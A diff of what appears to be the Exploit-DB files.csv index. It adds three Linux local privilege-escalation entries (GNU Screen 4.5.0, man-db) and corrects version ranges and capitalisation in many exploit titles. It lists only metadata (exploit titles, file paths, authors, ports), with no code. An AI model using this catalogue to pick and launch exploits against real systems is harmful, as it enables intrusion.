 35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
 35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0
@ -8407,7 +8407,7 @@ id,file,description,date,author,platform,type,port
 37183,platforms/linux/local/37183.c,"PonyOS 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0
 37211,platforms/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0
 37212,platforms/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0
-37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - 'diff' Command Privilege Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
+37265,platforms/linux/local/37265.txt,"OSSEC 2.7 < 2.8.1 - 'diff' Command Privilege Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
 37292,platforms/linux/local/37292.c,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation",2015-06-16,rebel,linux,local,0
 37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0
 37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0
@ -8762,6 +8762,9 @@ id,file,description,date,author,platform,type,port
 41130,platforms/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",android,local,0
 41144,platforms/windows/local/41144.txt,"Microsoft Power Point 2016 - Java Code Execution",2017-01-21,"Fady Mohammed Osman",windows,local,0
 41149,platforms/osx/local/41149.txt,"Microsoft Remote Desktop Client for Mac 8.0.36 - Remote Code Execution",2017-01-23,"Filippo Cavallarin",osx,local,0
+41152,platforms/linux/local/41152.txt,"GNU Screen 4.5.0 - Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",linux,local,0
+41154,platforms/linux/local/41154.sh,"GNU Screen 4.5.0 - Privilege Escalation",2017-01-25,"Xiphos Research Ltd",linux,local,0
+41158,platforms/linux/local/41158.txt,"Man-db 2.6.7.1 - Privilege Escalation (PoC)",2015-12-02,halfdog,linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -9140,7 +9143,7 @@ id,file,description,date,author,platform,type,port
 1242,platforms/linux/remote/1242.pl,"Xine-Lib 1.1 - (media player library) Remote Format String",2005-10-10,"Ulf Harnhammar",linux,remote,0
 1243,platforms/windows/remote/1243.c,"CA iTechnology iGateway - (debug mode) Remote Buffer Overflow",2005-10-10,egm,windows,remote,5250
 1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - 'admin_styles.php' Remote Command Execution",2005-10-11,RusH,linux,remote,0
-1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - 'resetcore.php' SQL Injection",2005-10-18,rgod,linux,remote,0
+1258,platforms/linux/remote/1258.php,"e107 < 0.6172 - 'resetcore.php' SQL Injection",2005-10-18,rgod,linux,remote,0
 1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Unauthenticated Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0
 1260,platforms/windows/remote/1260.pm,"Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,80
 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515
@ -9191,7 +9194,7 @@ id,file,description,date,author,platform,type,port
 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 (OSX) - location.QueryInterface() Code Execution (Metasploit)",2006-02-08,"H D Moore",osx,remote,0
 1486,platforms/linux/remote/1486.c,"Power Daemon 2.0.2 - (WHATIDO) Remote Format String",2006-02-10,"Gotfault Security",linux,remote,532
 1487,platforms/linux/remote/1487.c,"OpenVMPSd 1.3 - Remote Format String",2006-02-10,"Gotfault Security",linux,remote,1589
-1502,platforms/windows/remote/1502.py,"Microsoft Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0
+1502,platforms/windows/remote/1502.py,"Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0
 1504,platforms/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)",2006-02-17,"H D Moore",windows,remote,0
 1505,platforms/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0
 1506,platforms/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0
@ -9391,7 +9394,7 @@ id,file,description,date,author,platform,type,port
 3495,platforms/windows/remote/3495.txt,"CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow",2007-03-16,"Winny Thomas",windows,remote,6503
 3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow",2007-03-21,"Winny Thomas",windows,remote,554
 3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP (Subscribe) Remote Exploit",2007-03-21,"Winny Thomas",windows,remote,143
-3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (Egghunter)",2007-03-21,muts,windows,remote,143
+3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 < SP4 - IMAP Remote Exploit (Egghunter)",2007-03-21,muts,windows,remote,143
 3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)",2007-03-22,"Umesh Wanve",windows,remote,69
 3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - (Dynamic DNS Updates) Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0
 3554,platforms/linux/remote/3554.pm,"dproxy 0.5 - Remote Buffer Overflow (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53
@ -9536,7 +9539,7 @@ id,file,description,date,author,platform,type,port
 4301,platforms/windows/remote/4301.cpp,"Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25
 4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389
-4316,platforms/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32<4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25
+4316,platforms/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32 < 4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25
 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0
 4322,platforms/windows/remote/4322.html,"NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - SetText() Remote Exploit",2007-08-28,shinnai,windows,remote,0
 4323,platforms/windows/remote/4323.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - SaveXMLFile() Insecure Method",2007-08-27,shinnai,windows,remote,0
@ -9683,7 +9686,7 @@ id,file,description,date,author,platform,type,port
 5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection",2008-03-11,"Core Security",windows,remote,0
 5248,platforms/windows/remote/5248.py,"Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143
 5249,platforms/windows/remote/5249.pl,"MailEnable Professional/Enterprise 3.13 - 'Fetch' Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0
-5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0
+5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 < 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0
 5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
 5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote Buffer Overflow",2008-03-16,h07,windows,remote,0
 5269,platforms/windows/remote/5269.txt,"MG-SOFT Net Inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0
@ -9717,12 +9720,12 @@ id,file,description,date,author,platform,type,port
 5563,platforms/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow",2008-05-08,tixxDZ,windows,remote,69
 5612,platforms/windows/remote/5612.html,"idautomation bar code ActiveX - Multiple Vulnerabilities",2008-05-14,shinnai,windows,remote,0
 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer - (Print Table of Links) Cross-Zone Scripting (PoC)",2008-05-14,"Aviv Raff",windows,remote,0
-5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
-5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
+5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1 < 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
+5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1 < 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
 5681,platforms/windows/remote/5681.html,"Creative Software AutoUpdate Engine - ActiveX Stack Overflow",2008-05-27,BitKrush,windows,remote,0
 5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,623
 5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,8800
-5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
+5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1 < 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
 5732,platforms/windows/remote/5732.html,"C6 Messenger ActiveX - Remote Download and Execute Exploit",2008-06-03,Nine:Situations:Group,windows,remote,0
 5738,platforms/windows/remote/5738.rb,"HP StorageWorks - NSI Double Take Remote Overflow (Metasploit)",2008-06-04,ri0t,windows,remote,1100
 5741,platforms/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download Exploit",2008-06-04,cocoruder,windows,remote,0
@ -9887,7 +9890,7 @@ id,file,description,date,author,platform,type,port
 7926,platforms/windows/remote/7926.pl,"Amaya Web Editor 11 - Remote Overwrite (SEH)",2009-01-30,LiquidWorm,windows,remote,0
 7928,platforms/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX 3.0 - Null Byte File Overwrite",2009-01-30,DSecRG,windows,remote,0
 7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 - (ChromeHTML://) Parameter Injection (PoC)",2009-01-30,waraxe,windows,remote,0
-7966,platforms/windows/remote/7966.txt,"navicopa WebServer 3.0.1 - Buffer Overflow / Script Source Disclosure",2009-02-03,e.wiZz!,windows,remote,0
+7966,platforms/windows/remote/7966.txt,"Navicopa WebServer 3.0.1 - Buffer Overflow / Script Source Disclosure",2009-02-03,e.wiZz!,windows,remote,0
 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 (Windows XP) - bdo tag Remote Stack Overflow",2009-02-04,"Rob Carter",windows,remote,0
 7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 (Windows Vista) - bdo tag Remote Stack Overflow",2009-02-04,"Rob Carter",windows,remote,0
 8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass",2009-02-09,ikki,hardware,remote,0
@ -10027,7 +10030,7 @@ id,file,description,date,author,platform,type,port
 9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,windows,remote,69
 9473,platforms/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,hardware,remote,0
 9498,platforms/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",hardware,remote,0
-9500,platforms/windows/remote/9500.cpp,"NaviCopa Web Server 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,windows,remote,0
+9500,platforms/windows/remote/9500.cpp,"NaviCopa WebServer 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,windows,remote,0
 9503,platforms/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",hardware,remote,0
 9508,platforms/windows/remote/9508.rb,"ProFTP 2.9 - (welcome message) Remote Buffer Overflow (Metasploit)",2009-08-25,His0k4,windows,remote,0
 9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow (Windows 2000)",2009-08-31,kingcope,windows,remote,21
@ -10076,7 +10079,7 @@ id,file,description,date,author,platform,type,port
 9896,platforms/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 - Remote Buffer Overflow",2009-10-19,iM4n,windows,remote,80
 9900,platforms/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 - Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0
 9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Buffer Overflow",2009-10-26,"karak0rsan_ murderkey",windows,remote,80
-9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521
+9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 < 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521
 9913,platforms/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25
 9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783
 9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit) (1)",2002-02-01,"H D Moore",multiple,remote,3632
@ -10220,7 +10223,7 @@ id,file,description,date,author,platform,type,port
 11694,platforms/windows/remote/11694.txt,"Skype - URI Handler Input Validation",2010-03-11,"Paul Craig",windows,remote,0
 11720,platforms/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Code Execution",2010-03-13,"Mohammed almutairi",linux,remote,0
 11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0
-11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - 'LtXmlComHelp8.dll' OpenFile() Remote Overflow",2010-03-15,mr_me,windows,remote,0
+11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll' OpenFile() Remote Overflow",2010-03-15,mr_me,windows,remote,0
 11765,platforms/windows/remote/11765.txt,"ArGoSoft FTP Server .NET 1.0.2.1 - Directory Traversal",2010-03-15,dmnt,windows,remote,21
 11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0
 11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0
@ -10540,7 +10543,7 @@ id,file,description,date,author,platform,type,port
 16346,platforms/windows/remote/16346.rb,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Long Filename Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16347,platforms/windows/remote/16347.rb,"3Com TFTP Service (3CTftpSvc) - Long Mode Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16348,platforms/windows/remote/16348.rb,"Quick TFTP Server Pro 2.1 - Transfer-Mode Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
-16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21 - Long Filename Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
+16349,platforms/windows/remote/16349.rb,"TFTPD32 < 2.21 - Long Filename Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit)",2011-03-05,Metasploit,windows,remote,0
 16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a - CSeq Field Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
@ -10609,7 +10612,7 @@ id,file,description,date,author,platform,type,port
 16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflow (Metasploit)",2010-11-04,Metasploit,windows,remote,0
 16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (1)",2010-10-05,Metasploit,windows,remote,0
 16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve - Message Engine Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16419,platforms/windows/remote/16419.rb,"Mercury/32 <= 4.01b - PH Server Module Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
+16419,platforms/windows/remote/16419.rb,"Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16420,platforms/windows/remote/16420.rb,"Firebird Relational Database - SVC_attach() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
 16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote,0
 16422,platforms/windows/remote/16422.rb,"mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
@ -10663,7 +10666,7 @@ id,file,description,date,author,platform,type,port
 16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)",2010-07-25,Metasploit,windows,remote,0
 16471,platforms/windows/remote/16471.rb,"Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 - IDQ Path Overflow (MS01-033) (Metasploit)",2010-06-15,Metasploit,windows,remote,0
-16473,platforms/windows/remote/16473.rb,"Mercury/32 Mail Server <= 4.01b - LOGIN Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
+16473,platforms/windows/remote/16473.rb,"Mercury/32 Mail Server < 4.01b - LOGIN Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
 16474,platforms/windows/remote/16474.rb,"Eudora Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,0
 16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16476,platforms/windows/remote/16476.rb,"Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
@ -11003,7 +11006,7 @@ id,file,description,date,author,platform,type,port
 16921,platforms/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-03,Metasploit,linux,remote,0
 16922,platforms/linux/remote/16922.rb,"UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)",2010-12-05,Metasploit,linux,remote,0
 16924,platforms/linux/remote/16924.rb,"ClamAV Milter - Blackhole-Mode Remote Code Execution (Metasploit)",2010-10-09,Metasploit,linux,remote,0
-16925,platforms/linux/remote/16925.rb,"Exim4 <= 4.69 - string_format Function Heap Buffer Overflow (Metasploit)",2010-12-16,Metasploit,linux,remote,0
+16925,platforms/linux/remote/16925.rb,"Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit)",2010-12-16,Metasploit,linux,remote,0
 16926,platforms/windows/remote/16926.rb,"Mercantec SoftCart - CGI Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16927,platforms/hp-ux/remote/16927.rb,"HP-UX LPD - Command Execution (Metasploit)",2010-10-06,Metasploit,hp-ux,remote,0
 16928,platforms/linux/remote/16928.rb,"System V Derived /bin/login - Extraneous Arguments Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
@ -11281,12 +11284,12 @@ id,file,description,date,author,platform,type,port
 18825,platforms/windows/remote/18825.rb,"VideoLAN VLC Media Player 2.0.0 - Mms Stream Handling Buffer Overflow (Metasploit)",2012-05-03,Metasploit,windows,remote,0
 18834,platforms/php/remote/18834.rb,"PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)",2012-05-04,Metasploit,php,remote,0
 18836,platforms/php/remote/18836.py,"PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection",2012-05-05,rayh4c,php,remote,0
-18847,platforms/windows/remote/18847.rb,"Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote,0
+18847,platforms/windows/remote/18847.rb,"Mozilla Firefox 7 / 8 < 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote,0
 18866,platforms/windows/remote/18866.rb,"Distinct TFTP 3.01 - Writable Directory Traversal Execution (Metasploit)",2012-05-12,Metasploit,windows,remote,0
 18870,platforms/windows/remote/18870.rb,"Mozilla Firefox 8/9 - AttributeChildRemoved() Use-After-Free (Metasploit)",2012-05-13,Metasploit,windows,remote,0
 18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 - SVG Browser Java Code Execution (Metasploit)",2012-05-19,Metasploit,multiple,remote,0
 18893,platforms/hardware/remote/18893.py,"HP VSA - Remote Command Execution",2012-02-17,"Nicolas Gregoire",hardware,remote,0
-18898,platforms/php/remote/18898.rb,"Active Collab 'chat module' <= 2.3.8 - Remote PHP Code Injection (Metasploit)",2012-05-19,Metasploit,php,remote,0
+18898,platforms/php/remote/18898.rb,"Active Collab 'chat module' < 2.3.8 - Remote PHP Code Injection (Metasploit)",2012-05-19,Metasploit,php,remote,0
 18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector - POST Request Buffer Overflow (Metasploit)",2012-05-19,Metasploit,windows,remote,0
 18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 - Virtual SAN Appliance Command Execution (Metasploit)",2012-05-21,Metasploit,hardware,remote,0
 18915,platforms/windows/remote/18915.rb,"FlexNet License Server Manager - lmgrd Buffer Overflow (Metasploit)",2012-05-23,Metasploit,windows,remote,0
@ -14626,7 +14629,7 @@ id,file,description,date,author,platform,type,port
 35703,platforms/multiple/remote/35703.py,"sipdroid 2.2 - SIP INVITE Response User Enumeration",2011-05-04,"Anibal Vaz Marques",multiple,remote,0
 35729,platforms/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,multiple,remote,0
 35731,platforms/php/remote/35731.rb,"Pandora FMS 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit)",2015-01-08,Metasploit,php,remote,80
-35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
+35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.0.0 < 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
 35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler - Optimization NULL String Remote Code Execution",2011-03-04,"Brian Mancini",windows,remote,0
 35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 - '.au' File Remote Buffer Overflow",2011-05-16,KedAns-Dz,windows,remote,0
 35762,platforms/hardware/remote/35762.txt,"Cisco Unified Operations Manager 8.5 - iptm/advancedfind.do extn Parameter Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote,0
@ -15141,7 +15144,7 @@ id,file,description,date,author,platform,type,port
 40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,linux,remote,8000
 40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - SEH Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80
 40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
-40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
+40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
 40232,platforms/linux/remote/40232.py,"FreePBX 13 / 14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0
 40280,platforms/windows/remote/40280.py,"Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)",2016-02-26,ohnozzy,windows,remote,0
 40234,platforms/windows/remote/40234.py,"EasyFTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0
@ -15150,7 +15153,7 @@ id,file,description,date,author,platform,type,port
 40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161
 40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Exploit",2016-08-19,"Shadow Brokers",hardware,remote,0
 40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80
-40436,platforms/android/remote/40436.rb,"Google Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
+40436,platforms/android/remote/40436.rb,"Google Android 5.0 < 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
 40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0
 40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
 40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
@ -15230,7 +15233,8 @@ id,file,description,date,author,platform,type,port
 41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80
